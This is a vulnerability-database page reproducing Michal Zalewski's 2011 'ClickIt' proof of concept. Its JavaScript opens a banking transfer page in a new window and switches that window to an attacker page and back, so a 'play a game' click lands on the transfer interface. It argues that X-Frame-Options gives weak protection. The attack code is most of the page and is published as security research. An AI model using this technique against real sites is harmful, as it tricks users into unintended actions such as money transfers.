Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ClickIt Proof Of Concept

🗓️ 13 Dec 2011 00:00:00Reported by Michal ZalewskiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 38 Views

X-Frame-Options Worth Less Than You Think, JavaScript-Based ClickIt Proof Of Concept And Exploits Human Cognitive Abilitie

Code
`<h3><i>X-Frame-Options</i> is worth less than you think</h3>  
  
<script>  
var w;  
var dummy;  
var it;  
  
// Precache stuff.  
  
x = new Image();  
x.src = 'http://banking.beaver-peak.us/banking_interface/transfers/';  
  
x2 = new Image();  
x2.src = 'http://banking.beaver-peak.us/banking_interface/transfers/beaver-peak.jpg';  
  
x3 = new Image();  
x3.src = 'http://lcamtuf.coredump.cx/clickit/win.html';  
  
x4 = new Image();  
x4.src = 'http://lcamtuf.coredump.cx/clickit/win.jpg';  
  
function prepare() {  
w = open('http://banking.beaver-peak.us/banking_interface/transfers/','_blank');  
setTimeout(complete, 300);  
}  
  
function complete() {  
w.location.href = 'http://lcamtuf.coredump.cx/clickit/attacker.html';  
setTimeout(goback, 1000);  
}  
  
function goback() {  
try {  
if (w.document.body.innerHTML == undefined) throw 1;  
setTimeout(goback, 100);  
} catch (e) {  
// That one case where prompts.tab_modal.enabled=true would have helped in Firefox...  
if (navigator.userAgent.indexOf('Firefox/') != -1)  
setTimeout('w.location.href = "http://lcamtuf.coredump.cx/clickit/win.html"', 1500);  
else  
setTimeout('w.location.href = "http://lcamtuf.coredump.cx/clickit/win.html"', 500);  
}  
}  
  
</script>  
<p>  
JavaScript allows you to exploit human cognitive abilities to a remarkable extent; tools such as  
window positioning, <code>history.forward()</code> and <code>history.back()</code>, open some  
scary possibilities that we are <a href="http://lcamtuf.blogspot.com/2011/12/x-frame-options-or-solving-wrong.html">completely unprepared to deal with</a>.  
This proof-of-concept aims to demonstrate this; while it is intentionally crude and makes no real effort to  
conceal its operation, the transitions <a href="http://lcamtuf.coredump.cx/switch/">can be made seamless</a> and very  
difficult to perceive. Very accurate click prediction can be achieved by carefully measuring  
mouse velocity and distance to destination, too.  
  
<p>  
I discuss these attacks and many other unsolved challenges in web app design in  
<i><a href="http://lcamtuf.coredump.cx/tangled/">"The Tangled Web"</a></i>.  
A similar approach poses a problem with many browser UIs; for that,   
<a href="http://lcamtuf.blogspot.com/2010/08/on-designing-uis-for-non-robots.html">check out this post</a>.  
<p>  
<input type=submit value="Click here to play a game" onclick="prepare()">  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Dec 2011 00:00Current
7.4High risk
Vulners AI Score7.4
- x-frame-options - javascript exploitation - click prediction - web app design - browser uis
38